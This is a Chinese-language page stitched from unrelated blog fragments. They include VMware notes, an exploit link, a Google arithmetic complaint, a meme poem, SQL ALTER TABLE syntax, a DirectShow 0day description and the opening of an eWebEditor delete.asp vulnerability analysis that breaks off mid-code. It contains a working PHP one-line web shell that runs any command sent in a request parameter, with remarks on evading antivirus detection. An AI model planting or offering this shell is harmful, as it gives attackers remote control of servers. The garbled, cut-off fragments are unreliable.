原文：http://hi.baidu.com/appcn/blog/item/43c4eafce7888042d6887df9.html

在安装虚拟机VMware tools之前，你需要知道如下概念：
（1）虚拟机有免安装绿色版，也有非免安装绿色版，一般非免安装绿色版在你安装

来源：老鹰天下

编译不通过可以对比以下的的exp

http://www.milw0rm.com/exploits/1742

两个代码相似度几乎为95%

当然作者没啥恶意

输出了Bad.handshake，其他貌似啥没做。

本人水平有限，只知道这么多

有用户在Google的帮助论坛发贴，投诉……Google不会计算减法!请看下图：

这个结果显然应该是1，但是Google却给出了0的答案。而Yahoo和Bing对此的计算都是正确的。

PS:转的，很长。

每当夜幕降临。
哥总是拖着疲惫的身躯
把我那泛黄的迷彩服脱掉，
换上了我从夜市第三个摊子买来的非主流服装。
昏黄的路灯下
有一道孤寂的身影走进了小巷深处的一家网吧
留下的只有寂寞的背影
没错，那就是哥
熟悉的走到了吧台的位置
拿出了8元人民币
淡淡的说了句 “包夜”
吧台新来的女网管，对我投出了一道暧昧不明的微笑
哥无奈的摇了摇头。
淡然的接过了那张临时卡。
在大家的心目中，我永远是个温柔而又不爱说话的哥
但是

用SQL语句添加删除修改字段
1.增加字段
     alter table docdsp    add dspcode char(200)
2.删除字段
     ALTER TABLE table_NAME DROP COLUMN column_NAME
3.修改字段类型
     ALTER TABLE table_name    ALTER COLUMN column_name new_data_type
4.sp_rename 改名
     更改当前数据库中用户创建对象（如表、列或用户定义数据类型）的名称。
  

DirectShow 0day是一个中率极高的0day漏洞，目前已经开始在网上爆发，其攻击形势不亚于去年的IE7 0day以及往年的ANI 0day。

攻击特性如下：

1.使用了.NET SHELLCODE技术，机器上装有.net framework就会中招。

2.利用XP自带的Windows Media Player播放漏洞媒体文件触发。

3.Internet Explorer和Firefox 通杀。

4.所谓的微软MSRC的killbit临时解决方案后，至少有两个以上clsid和HTML标签可以变相加载Windows Media Player播放漏洞媒体文件。

解决方案：

作者：skyfire[B.H.S.T]

源码：

<?php
/*一个新型的php一句话cmdshell(非一句话木马)
//原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令，并返回命令执行的结果(string类型)；
//局限性:特征码比较明显，``符号在php中很少用到，杀毒软件很容易以此为特征码扫描到并警报；``里面不能执行php代码；
//write by skyfire
*/
echo `$_REQUEST[id]`;
?>

作者：oldjun

这个漏洞可以很鸡肋，也可以很致命，关键看你怎么利用！

此漏洞存在于Example\NewsSystem目录下的delete.asp文件中，这是ewebeditor的测试页面，无须登陆可以直接进入，看这些代码：

' 把带"|"的字符串转为数组
Dim aSavePathFileName
aSavePathFileName = Split(sSavePathFileName, "|")
' 删除新闻相关的文件，